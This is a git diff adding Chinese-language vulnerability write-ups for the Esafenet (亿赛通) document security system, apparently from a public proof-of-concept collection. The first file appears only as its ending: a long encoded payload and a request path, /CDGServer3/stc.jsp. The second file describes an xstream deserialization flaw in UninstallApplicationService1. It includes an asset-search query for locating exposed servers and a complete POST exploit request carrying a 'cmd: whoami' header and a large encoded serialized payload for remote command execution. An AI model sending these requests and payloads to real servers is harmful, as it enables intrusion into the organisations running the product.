NPDFALEHFIJDGIFOIOPFFPCKPIFKEEOLCDLNJAJPGENGEGFOEFJNKGLLKDPPHPMBDIFMPKJGCBKFPEFOOGBKBMLPLNJFNFMBOGHHNCIIEANEHKLOKNBDHCOGCKNGEOILHIJDACBPGKKJBEPIMPFEBHGCGAFNLKGBAALODHNDFLPMFDCPCAGDDOCIOAGMFOIPKLEGLCBCNHFOPEGDCEIDFAEKBKDECKIHPBDJIDIDGALCBBPMEPBEENLNHDEJHDHCJBLLMJKCOIMAHKBPIDNKIJGNMJIIDMEKONMACBPBAKKMPAAIODIKKPBIJCMJBHNJENABEMHCAEFAMNFBBBAHKBCAJCCFLCBCIMGOKNLDGNFOENHGOMADLCCFCOIFABGGBKAOBMFOOKCIFFFDEEJAOJKEELDIOFECJGKHHFIIHEEFPPMFEPJDBGAKBDIPPFOOBLLFIJEJOENKDBAHALJHGGHHJMKNKBGAJANOIAACPNJCDPGKADDFEOJHMEAFBPNHHAGMCBMOPDPOHHFIIABBJMGDCDKKJIBCKOJGLPDGEBIDINBCIHFKILFFIDBHJALOKIEAFOKFDMNPJBDEOKMJNNCMJCKPJDMMEPKOPFCFOCPICEOHHKIPFHDAFBPIMJDENMGFMOPLJKEINNHIHEFNMDFAFEIPCLBEGDOJLDAONAJGBPPLKECIFJIFGGEKBIGANDMGLKMJLPCENHHAGGHIKLIIDEJEFGFOBANCFOJDFBOAGFFGLFICHEPDHGMPOOIJBDIMMMNBDDPLCCAMFGBMJHBEBOAJPOGKNGCCMJCLMFLBMHGJMLOIIHAJCFNBGLEMHAOGOAEBDGBJCNJOCCJFPGKJGJLBELGLPJAIJCOGBCIMDOEPDOPLOJNIFKGGBJGJIIEBHIKNJPDHGGPCOMOHFFJJOLMEGPMMCLIKJABCAKAPGJNNMNCAACMNHJFJACKALBGFIHBLGLLKCEGIAADFOGDMLMHIFFKFLCLLJFAPNOMGGIGOGGGIMPPIOLMPOKFMMEIFALLLLDAHBBEICFLGHBNGMEHJAEAIDHMIOPJIOEPHKGBCBAMEPHCNCNOOONGKOKPOLNIJJNFPILKODJOKELGKLAJHAJJCCDNFCNDOPGDILHFPCFDPFNLEJGPBGOJCDKGBKOFEBOEJJKBLIFDMMMMPGPGJOBMNNKEBDCDIOCFJAHCBJNIDKANFLJDEHPMICAGLBHAJBKONFEODPIHGHFNABBJJGKLGLABDNMEMDJIEDAIFBDGKEGEHACPIOGNJPNKHELAIIPPJFLEDDJFNEMCDOHKKDEIHAFIGDKCFOFFAHJDEBNMDPPABPEDEIMJCOPDBFPLGLMLNCIHKLLGNFGJPAIHACFLEKEBKCCIBCHMNHGAEJCBIKILPEBNJFIHJBBPKCINFKEIMDAGCFCADEABMEABDJBHFJKIMPBGEDDOBIEJFOJBPOKDPKMOADFBGGLBFOLEIMKKGJLEOCGBNPECCJPANAOOIMBPOIKGNAIIMONPOHLIGPFPBKMGDCBGOODFHLBLLJOOBFBLADAPGODGGCNBNLLBHHHLNOHNOOHIMDFAMJKGPNKCFHBAHJDMAIBHDPINLMDMEMGINEIJOABHICCCAPDBEGGCGLCFECNJLILBMFEEHGJLCAFFNBCMGDEHFDFDFMDLKFNPNNNFONILACJMCNEJLCFDFFJIHLCNPOMKLPLBMIIONLFGNLNKCFGDCPLOLOFAMPBOMGKEOEPHMOGGPLPBJLNCKCHJNGJNDLMCNGECDFOEAFOGHEGDOCEHONPBOJJDEJCOMLABGDEMCELJKCIBALONDJCOOIBPOCKHCGPCIKLIIBDNEHNCNGLDOPMPGKFFKMCIEEOAEAEJJCHPIIOHNKCPIFHCNAIBFAANMBLCDDKDCEKDKOFOKKAIJLECJJFIMPHJEDBJGANPHEPDEAALDPNIPABCLAHGLEBDBGLLIBMGKDGDOFAEBFJMDKNPOJJFLHPGCBMCELAKAOBGMCNIKNOLHNNJNBMDGNKCDKMNLMKMEGIPADAJILFEMDNMNIFMCFLLHLIEMNDAMPIIPKLPNLFCNMJNLHDNNDOCMAINBADEMHHOEEFLANPCCALHLIKOGNOANDAGBALJGFNADNMMMIOKDDGIPBMCBLNNGIGOGFIJPKFGENHNHGHPMGIKJANAMNLLILACALHGKDPGIBOJNGMOPDIGMFIAOOCGKONGGMEJHEOJMEEFHABJMEMLIAAOBAHKDNKDCHEEJIMJNJFAGDJINDGHNDPODOLBCKGPJDAJKFONJOLKCLHLHAJKACJNMGHPLNGHKGKNBJIIJOJACJIGLIOGDDJKKHIFAAFFHKILHOJPOIBHEECKMGFJFBLABJEMIPLIEGEKIFOOFGEOAGFAAODIODLPEIHDNEDKAHEINMCCABEFCKMMPELAFMHCAFOGPEPKEIPKHECMJPAOOIMBJAEAKFBENJKFBJINOKNEKCNBFNFDFGAEMGHFGPPFMENFFONFJOIPDHEBCPDCLNPHMMEOBBLDGIDOFPBKMIPGHCPNPJLMJDENIFMALMKMJHCOOAGNCBOLFFLEHFCNFLKAFHGEOLJMEMJAGAFEAEINCGCMHLMONEKLMHGEKCAJHIFOMELLLFHABOJDFMCCJHHFACNMFGIHKADBKMDLNBGLDHIMHMCCEOLPMCNGJLKIEEDLDICKAJKHFHMGJBOJLDOCKMLCEGGEEFCODGHAMFLMHEANHNOFMDPDNCLECNLAKHEJAJDNJHEPNHIKAMECGFPPHDOFIMAJFFBCKNOFLEEMDNOGODGCDBGIFGNPKEFNIEGFBCJLKANKONKDOMGCBKELNONEGFCPADCEBPDEJMGOAEPADAPEHGAFBIDNPOLIGMPCAPEBNCGIIEBFIGDPONHNHICINNNHENMIMHBMMECEKNNABEMMOCDDHCDDEIBMOFNAACKGJFGDPMJNGHGBDKGECJDLGMMGEIJKNKEHBJAKIBJABGCNINKHJEIHBMCACMJPDHNCEBBGOHMJBONLKNBBOGFMIEMJGOENNCBOGOMELKOGCMJAKKHIMDDGGFKHPPMBLAJBONANDMMOENPPFAECNKJPOGCOOIMDIFNDBKPDIBCPDELKPGNMAPLCJKAMANCOHCIBIKHKICECCEEIMCCPOFKFPDEPLKNCCJHCLAMFLFFJPIBFDAEPHEENCGPMDJFJLAFBNFFIAKJDPHMHMIJOLCGOIFPNEJCPEKHHMGDGFCJBBDKAJPIHCGCKBFLLAPGDGGNBKGLGEONFAKHAMBIDCLIMEIGFBIGMKBNNCJJNNDBLGGCBHGFFJCLDIJLLNLCJBFJBBCIDPOAGKFGJLMHOMLLLHGNONCLDHFOFABDKCHKMPLLIFNDMNCDCLHMJDPBLEKBIFFHJCPAHONHFIINJBCPANHOOPIFIBCIOCHEBKNEDMDDNMLDNGIHPIDNBHMFPBONLNALJLCPKCOCMHDGJEHEFBOOLJIMKPHHDGOANOILAHIJCFLECGCEEINMNCGEAKNEPHIMDIMLOOMEDFLBPPMBNJKLMMILPKKCLHJEFBBHDKPHFLCKOBNJKGBKAIPJDPJMPNAMOMDLBIGKCILNJMNHDEBKLAMBFJBIHBLFACGOOGBFPHNDPBHNMBBCFFFFFOODNDFHOPIIJDNPBJACIJJNHALKFHJBBADGEGNMGBBJGFDKMPLAENENCJENOOALALIIJKDCGMKMILDHOECGIBDCCODHNHOPKIAMGMACICEEEDLAPHJGEMCKCALNFKJINPNOHGAMCOKDICJJAMGDFPIIDONGFFGGKMEGGKKFANCPFIJLANGIIEHDINKHBGMAPBAEJFBGOLBLNGDDNIJLGPMDLFCEMLGFPICJHIEFBIBOONDGDNENIMMDPGEGJFJGDMDMDGBFBFIEHCEKCMJKNDFKFBLJKDKAEBHGPBCONEGGGPFLNNHGIACGDOBLDCCNIBJNLHDKGBKOBDKLKAPGKOEFPIMPFGDALBJIEAANKFBCJBOMMHLDEMGLPFFKMFLMKNEDKGJBFLDNMBIMECAEKGAEAGEICPHELHLFBCFLPGEHILDPEALFLKNNKEBFJKIHDAPBAHBJKLHPMGKKJFDJPJAIBLGILJGJLGGNFJHGCIAGJKFOFAPMJHNGDFOGPLDOLEBFOJFNOHGNOGDLGCNNGGLACENMFNEDEFECLFGJPMDPPMPMGCECEFBBPFDNLEFPLGHLMOAIMAHNLABGDOEENKJANLCANNIHMGCCLGNMJKCHEKICIPPAHDAHFMKBLBGGJALAEECPCLHJBMNBIHGPABFELDEDHLEKMPMNAMELKPCMMHEHGGOHNJCNBEDJLGEKONJADOFKDNGPGNOKCDFCLKLOKJELACBNCPJBGEDGOCEEBCGCCFDFGFOLIDFKOLLAHMIGNMKJFGOFKOECFIBFNILJICNAGFNCMCBKNKOOJGKIPPLDADGNJOEFPFCHMAPOCMHDMHHBIJPLBCOBFDLMONNHJJCPMGBDGBKOKILDGBOIDMDEBCJCHPIFMDLHBLJGLEEEOBODPDOHJDFMJLOLIHFLGPKFOGLPABENOJDCEBGDBOFHOBPDPBBBCPFECLNJOJPINDIMGCBBFPBDEKGLIJFEJNJHFCCHGDFHNCPPIBKIAPHACLIOFKBDELBBEBHPNGBEPLNNICCFIDAKCCAHOBAGBFKLLJEFCMELMDBJNFGINLOPGEEGBECIAJLKILLLBONBGECOIDPJJOLDNFCDINLOEHAEMFKCJCOHKADHIBNDHLLAKHCNIGDFKJHDGFGEPDOFMJNHOGKPAFPGBJPGJBCMDJHHNGNLOIKBBDNKJPKCJKDKHDOOBOHAFCOBCPJPMHFDDIDLHCCBHNBLLGOBICABPNLIKPBBCHNJGICEJIHHCAKJFONPAPCPHHKAHNMKMLGILBCFCBFNDOHHICGMIEBFCKMNIAGEJEAGDILPFCILPGAAPPEAOGNKPABJDHICNGBNFIOGIDMFLNEDLLKLAIPPDIMCGAOOGGCMNFHHAOLLKDHNCFMAPFOBKHKNMEFGLCOILBMAMNLPMGFPBJKMONOLIKIKEGMOFMFHEBCFFDCBIDJMMPPLOBGPHNJNICHMDMKALFLFOGHLBPEIJJHANKBJIKHIKDIBAFJMMIFMDCALKFAEAMDLKKLFMFMFJOLAFFKBFNDGAEBLGMOMPPEPGHFGFBDMACKLKEBJIHPGGHMNIKFABFMANJBMLGCLBJEFDBKCOBHDIDLIAGCJFHDJIGLNFPEMOEDPHDIKMDHFDELMKMFDDIAMOJFNBBBKKNFCHKDLKLDABODFGGGIDEKDKKBOFMJKCKFDBJJLKIKAHIBLIKIJPAMMKDLOIMPKNNIBJCNCOPLLEGDEBCPMEKCGAJGFEIJJJHJFCMJONDBJANNEAEAOPEEHDLANHGIPDLHNDJLOFCIAGPEPAEOHEJMMBAFLFFKJGNDBJIELPLOPENBDEMMPHHMIEAGHKPDILJIECILEMEFCKJAOEGCOPDBDOCADNDPJDPMNIIICCPKNKFLLJBLGCFHKHHOIGLNGBJFPKMGLJAKKFGGOFOKEOIKECNNMIEDEKAONLDKPIJCHLKOIHMLNAJEDONHBEMFKKMOFLDBBEDMGBJACKNMPFIKHIGMLGIHJPPHPBONONABFOOMAOOAEOFLGHIDJMJMEGICEAGLBBIAPCAEFHCOJNCMFKMABIFJGEDMIOMFBDBBMNKJKJAFGNDPPKLEFPKHPJLMFKMFBAODDBMMKNGHJJDCIJNAPEPOKHGBBNCIIDMJEOIGMDIFAOMOHPLFJGBGAJMJGJJHCBNDJLBOGELHEJLBKMHGPBAKJFLBOEAAEKOOPOPOHJIPAAJPLLHAAPHDNGNOLPPAGCIMLAFPOALDCABFMMKCKKIKHHANIOADOLHJPNENHKMJOIGGNFDPAFPPBACFJEAHDDDMPEFPJPDLPMJLLMAFOMPEANCMKGMGDFEKJDDNEOAFLJILBHDCIKHPHCBGBJJPNAGIOKLKIDAOMMNNEDCCMANNKGKHGPOLFOKBCGAFBNCOEJHKGMHCJAJKNMNFNEDCFLLCLPCMHPPGHCJCGNNMILCANBIGFGPPEMOIKCNOOJEKMOPICMAOCEDIHHDLJFHOIFINOBJPNKOEGJDBBLNPJLJFGHPAEHDLHLLHCCMILAHIBHLIFIFCJFBEALMHMOCHPKGLPGMOMIFEGMGHPMONMCAFMMKPMDPBBLHDNDOOPDFDGOGGGNJIBJFMNIALCFEBDMKONCCCCOJFEGHMHEDNFABDPEOPOKDEKBABODDEKNONMBGFMICGDFFECNAFLALINMEIOMLOKGLCICKOINIKONIMBABDCDEKNBEAENCCFDPIMBFFDMOJBFEBNKGAKFNGJCIFJGOEPEOJEMIMLKCHOLBGHLPJLPHLHNPPLLEFILKHEECKEKPPGFOJPLDBJCLFKHEKGFDMNLCBEAKMBBOGPFHCEEDCIADCFGEMMFKOJMHGGGAHIOGIMMDFFBBJLJNGEHDAHFPKNFJGILEAGHPCPFKIKBOHMNBJDANFHJMAGEAALHBJCEJNADBCOPFGEFNEAEBAKGAFNBKLNHADNEPHEKDJFLCPDAGLJKHBMJCFABNGNDAENDHJHAMGJBKKDFHCJKLACECMIAHDBLHGAOGEKDHMJHDIEPLFIPKCGGFBKHPJCOJEOEPOBEAEICOMLGFOPKFJCPFNDNGBGDDNHEFJAJOGNCHCDKOHKPLMBJOHCJMHGEGOJIJCIFAJJKKBHFNCDLGPAPLKGAKPODICOPJGBCIOCKCFHCKKNLDAHOJDKOKLGMKDHEIFKNBNCGFGGMFMGJCMIDJMPJHCGKOFNJHGMCEJKIOHDHKPBJJHKKMBBPODLDHJPJNFKFPANIKJLCPIGMHKELCNDCKLHKIDEHOPOKLGAJNFLHAPNMJJOILLBGPFIILFPILGGBPGKJODPEOGOJKHGFLOEKPCMIDFKEBENKDMOFKPMKILHLMIDEMAHAFOEOGDGDAOMHBGPCCJAFELLDCDPGAJFADOJIBFEPGIANAIBMLBEJLCEGEEKHJLOIIECFKPPJKDGMBOKAECIGOMMPCBGKFEBDBBLBDOGICIEKHCBOCMAOFOPEBMBDNJEDMNOJAEKFFIGNPJECCPOBDPLPNLEMCALKNAGHEGHKJGDFPMHOPADICFBOCDODPAIMLEDCLFJBLBCGGNNKBBMCGLGKDPBHJGLAKENAHIGCOMJBBKEMJMMNENCKNCKPIIPAMFFPNLACNBHPCIDEAJAFPHGGENBGCIGGEJLBADCDMBNLLILBFFNCOMJHLLOHPLKIOBHNJIAHFKBHHJINNJGHNBBGEIGDEDFJAMLPEEIKGONIFBKBGEEKFALAEPDLLLFDEBDEGGABCCHILKOLIJHGGLEMGKDHEELJGHFBLJPHNOMDAOJHEKANHNOGEBLBPOGKLCFAFNFIFBFGCNDADGBEGFFGMHELNFMNPOMMGJPDHPJOHIBEEPNBAPPEKGENLGOEOLEPFDNKEGCANNGNIALLHBJMIHLDKDNCDPDOEHCPFAOHFNNCPHEPLHBOKDCNPAEGEFCIEIPNOOKILJCBLOLJGELBCDGJLLPDFKMOCOMNGKHAHPNLMFDMCLCJCCIFCOAHGBEJAOLACLJAIFKFLAAEDCGDMOKJBJKGLKHGOLOBCLONPANLHHNBKJFMCLACNGFKCKJKEFFKJKMKJJNPECENEAOIGCNEENDKKPCFHAKHNKDLLLGNMFKOKKICHMCMCNFLEIJDIMGHFJCAPIGLDIODLKCOEMMHMGHFKEEIGEALDIJGOBOAHGKGAAEPCCBBBFLCGAPNPCDGCOIAJEANBMCFIPBJDOOMMMAELKEDIBEOCBHGJNNCIEMJANAOCHHABCOLELJJENDMIFDBHEFEJEFGPHOMACBOLOPKIKOGHOGGDIBIOBCKFHLFILPBOMCENKMNEDOHKKHEGLDAAPLGAPKCDOEDEPIAFLMCOGLAOELIAMBLFPHAAMOIHNLGGIKFFCDJIKILNHOMONKLIIFPHBGKJIPGFENEJHJGKPEIGDIODANABHHPKKAAFJNBHIDNDJGEJEJCJPFPBMFGDCLCNBDCBEICFKEIDEDGBEMLPDKJLCKBOHCOAIJHNPAIECLBJJDGELKEJHMCFKLLOMPFNJFKFEAILKDJJKDLOOOOHAJOIHJGGCPJJDCBMGPMOGIMFHFMMIEGKMLMNAMFCACOCPLAFCJPDIEFJNGHMDKJHKKBEBOFBACJINKJKIGJKFKGLMLMKDNFMMMNEHPKFGFOILIOGEELJKEHPHOLMDAIPLOILNEEDPCBMOGONDCGKMAGHPBMIENCDEOLFADDFNJJCPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLENJJHKMNFBPELLCHODKDMINFDIILDGAHKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEMBFGIACAKNFCHHFJJPGGFNKIMFFDJGFNFHJEGMAJEBOJGFDDFJJDGJKPIDNFKIKCKPBEMINOGDILOHHHFPPCKKLEDFIOEEODPCINAKJDCIBJNNMLOICFPIFCOJBHGBFCOBFGJLMONDMFDBFIOBANPKLDIDCJKLIBHDJJPINOGCEKBIPKAHCJOOLADCDAEHKDKOJDKNPDEDICENMLHDKDPBNJLGDIILAJFFHBOEAKKENDBOHDCLPHJAKKAEJNMLFLFOGCFKGGGMEDGCFBGMFLCD
+```
+
+![1704466134305-cdd12d0e-c56e-43f4-b7c5-4c0ab6461190.png](./img/Ee_yrEjypi5abc_7/1704466134305-cdd12d0e-c56e-43f4-b7c5-4c0ab6461190-802984.png)
+
+```java
+/CDGServer3/stc.jsp
+```
+
+![1704466164173-6e8f908f-a555-4903-8ddf-818a72e8f11a.png](./img/Ee_yrEjypi5abc_7/1704466164173-6e8f908f-a555-4903-8ddf-818a72e8f11a-995129.png)
+
+
+
+> 更新: 2024-04-20 22:01:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wg0flo918othfwbw>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统UninstallApplicationService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统UninstallApplicationService1存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..ee89021
--- /dev/null
+++ b/亿赛通电子文档安全管理系统UninstallApplicationService1存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统UninstallApplicationService1存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统UninstallApplicationService1存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/k6HgGvFP2_AD6epE/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-193286.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/UninstallApplicationService1 HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJE